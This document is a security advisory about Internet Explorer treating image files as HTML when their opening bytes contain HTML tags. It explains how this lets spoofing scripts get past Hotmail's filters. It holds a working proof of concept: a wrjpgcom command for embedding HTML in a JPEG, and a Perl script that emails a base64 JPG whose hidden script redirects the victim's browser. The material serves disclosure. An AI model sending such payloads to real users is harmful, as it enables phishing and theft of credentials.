Vulnerability

    IE

Affected

    IE

Description

    Kee Hinckley found  following.  Internet  Explorer 5.0 on  the Mac
    and 4.0 on Windows both have the problem.  IE 5 on Windows did not
    seem vulnerable,  however it  also didn't  display the  test image
    correctly, so there may still be issues.

    First.  Internet Explorer has a "feature" which makes it  possible
    to cause it to display arbitrary HTML that is embedded in an image
    (or any other type of file).

    Second.   Hotmail at  least, and  most likely  all other web-based
    mail systems, does not filter  out HTML hidden in images  (one can
    hardly blame them).  As a result, the JavaScript and CSS  spoofing
    attacks previously described  on this list  can be used  against a
    Macintosh  Hotmail  user,  and  Hotmail  will  *not*  filter   out
    offending HTML, JavaScript or CSS  tags.  This technique may  also
    work against some virus scanners.

    When  IE  reads  a  file  from  the  web,  it  doesn't  trust  the
    Content-Type or  file ending,  instead it  examines the  first 256
    bytes  of  the  file  to  see  if  it  recognizes  the  file type.
    Apparently  this  is  considered  a  feature, although it's caused
    no-end  of  pain  to  web  designers  who  are  trying to assign a
    different download  behavior to  a particular  file.   The problem
    does not occur when the file is read from the disk.

    The parser that IE uses is not terribly sophisticated.  If it sees
    one of several common  HTML tags in the  first 256 bytes, it  will
    assume that the file  is an HTML file,  even if the rest  of it is
    binary  garbage.   Since  it  is  possible  to embed comments in a
    number of types of files, and those comments often occur close  to
    the beginning of the  file, it is trivial  to convince IE that  an
    image file is in fact an HTML file.  Viewing this file from inside
    an HTML page (ie. in an img  tag) will show a broken image in  IE5
    on the Mac  and Windows, although  IE4 on Windows  shows the image
    correctly.   However  opening  it   directly  in  the browser will
    result in  some garbage  characters, followed  by the  interpreted
    HTML content.

    To create a commented JPG  file with embedded HTML, try  a command
    such as this on a Unix box:

        djpeg sample.jpg | cjpeg | wrjpgcom -cfile cfile > html.jpg

    where 'cfile' is  a file containing  html.  You  may not need  the
    djpeg/cjpeg combo, but my first attempt just using wrjpgcom didn't
    put the comment close enough to the beginning of the file.

    Hotmail can  be persuaded  to treat  an image  as an attachment by
    giving  the  file  a  non-standard  Content-Type.   Since  Hotmail
    doesn't know that the browser  is going to interpret an  arbitrary
    attachment as an HTML file,  it doesn't filter the content  of the
    file.    Clicking on the  attachment will   cause Hotmail to  scan
    the attachment for viruses and then  ask you if you would like  to
    download it.   When you click on the download  button, the  window
    will be replaced for a  brief moment with garbage characters  (the
    raw JPG) and then the HTML will  be displayed.   In the case  of a
    JavaScript or CSS exploit,  the code would presumably  replace the
    page of garbage characters with  a password prompt or other  item.
    The user  would not  unreasonably assume  that something  had gone
    wrong with the software and their session had expired.

    This vulnerability was originally discovered by Anders Pearson and
    Peter Leonard of  the Columbia Center  for New Media  Teaching and
    Learning.  They ran into it when they were attempting to embed XML
    in image comments.   Kee heard about it  from a discussion on  the
    WebDesign mailing list and  wrote a test exploit  (enclosed below)
    to see if Hotmail users were in fact vulnerable.

    The following Perl script will email a small JPG image to a  user.
    In order to ensure that the  file is treated as an attachment  and
    not  displayed  inline,  it  has  given  the file the content type
    "image/jpg" instead of the proper "image/jpeg".  If you mail  this
    to  a  Mac  IE  Hotmail  user,  and  they  attempt to download the
    attached  image,  it  will  redirect  their  browser to one of web
    sites.

    Although embedding the  HTML in an  image makes it  more likely to
    pass through filters,  there is nothing  inherent in this  process
    that requires that it be an  image.   The user's expectation  that
    they will be viewing an image file helps from a social engineering
    context, but  even a  text file  that has  been given  a different
    Content-Type might pass  through filters.   The key issue  is that
    the browser thinks  it knows more  about the file  than the person
    who sent it, and that it  is executing HTML code when the  user is
    expecting it  to download  a file--before  they expect  to have to
    worry about the file's content.

    #!/usr/bin/perl
    
    # sendit.pl
    #
    # Sends a JPG image (with a false content type) to the destination email
    # address.  The JPG contains  an embedded HTML comment which will
    # cause some versions of Internet Explorer to interpret the file as though
    # it were HTML, executing the contained JavaScript and redirecting the browser to
    # http://www.spamwatcher.com/.
    #
    # The HTML in the comment is:
    #<html><head><title>foo</title><script>document.location.replace('http://www.spamwatcher.com/')</script></head><body>test</body></html>
    #
    
    use Net::SMTP;
    
    die("Use: $0 from to\n") if (!$ARGV[1]);
    sendit($ARGV[0], $ARGV[1]);
    
    sub sendit {
        my ($from, $to) = @_;
        my $smtp;
    
    
        $smtp = Net::SMTP->new('localhost');
        $smtp->mail($to);
        $smtp->to($to);
        $smtp->data();
        $smtp->datasend("To: $to\n");
        $smtp->datasend("From: $from\n");
        $smtp->datasend("Subject: Test of html.jpg\n");
        $smtp->datasend("Content-Type: image/jpg\n");
        $smtp->datasend("Content-Transfer-Encoding: base64\n");
        $smtp->datasend("Content-Disposition: attachment; filename=html.jpg\n");
        $smtp->datasend("\n");
        $smtp->datasend(<<X);
    /9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof
    Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh
    MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL//gCJ
    PGh0bWw+PGhlYWQ+PHRpdGxlPmZvbzwvdGl0bGU+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlv
    bi5yZXBsYWNlKCdodHRwOi8vd3d3LnNwYW13YXRjaGVyLmNvbS8nKTwvc2NyaXB0PjwvaGVh
    ZD48Ym9keT50ZXN0PC9ib2R5PjwvaHRtbD4K/8AAEQgBQADwAwEiAAIRAQMRAf/EAB8AAAEF
    AQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUS
    ITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZH
    SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqy
    s7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMB
    AQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUh
    MQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVG
    R0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ip
    qrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQAC
    EQMRAD8A8cooor9xPNCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
    ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
    KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
    ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
    KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
    ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
    KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
    ooooAKKKKACiiigAooooAKKKKACiiii4BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU
    UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFd34pl1CxufENjqen+TZ+Z5VhbCOFlsGaSOVQ
    AhIi3RbsleHIOdxUkcJXo3jW/ub/AMKQXFw6KXv9u0XtlOJCFdiwNvGrEhpWLbiADIDhi5I8
    TMLrE0FZNNvrqndPT7jSGzPOaKKK9szCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo
    oAKKKKACiiigAooooAKKKKACiiigArv/ABlLpkfhu1g0/VbaaZrthcQW9vaokxiaSNZQYVVl
    GPmCvkETDaTtY1wFdr4ssdSsNPnstQg0eSS1vVU3enWscIOUYBSViXeMpIowflaOQMCdmPFx
    8VLE0LvZt9PLuu9uvpqaQ2ZxVFFFe0ZhRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU
    UAFFFFABRRRQAUUUUAFFFFABRRRQAV0us/8ACRz6eW1XW0vreJlfy21qK5IP3QwQSMSeTyBw
    Ce2a5qul8SeKItdWVYtNS1WW7e6JMgkYMxZmwwA5JcgnHKxwj/lnlvNxSqutT5IJrW7fTbbX
    r8ylazOaooor0iQooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
    ACiiigAooooAK7/xvqMesaW+owavc3kUl+S1udRmnigYhmAWN7eMIMEhSWOQGABwSOAr0bx5
    d2ep6VLe6bq99eaf9vVIInkvJY4/3bhgzTDaWwEYAEEebIp3KqtXh5il9aoNp7vXottHp16b
    GkPhZ5zRRRXuGYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA
    BRRRQAUUUUAFehePvD+p6Xp8Qv2+1w2MsVja38lq0DPCEfaigMVKqyS5JXdjYwZlcY89rsfE
    Wm22nWEyPZaLa3IYIFii1JJsjaxCicBMhWUkHswI5IrxcdJrE0bN7vS1+2t7pr8TSGzOOooo
    r2jMKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
    ACvU/iO/+gXgvEkhvJL8BnOmPAbpot4Dh5Lht0eJXwVU4ARTtBQHyyu/8YaBY6L4etriK00t
    LmeZ7eRY0uVeNo5GRjGXmZZF3RMCSAQGQkKWGPCzJReLw/M2nd2SSd9t30RpD4WcBRRRXumY
    UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
    FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
    UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
    FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
    UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
    FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
    UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
    FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
    UUUUAFFFFABRRRQB/9k=
    X
        $smtp->quit();
    }

Solution

    Nothing yet.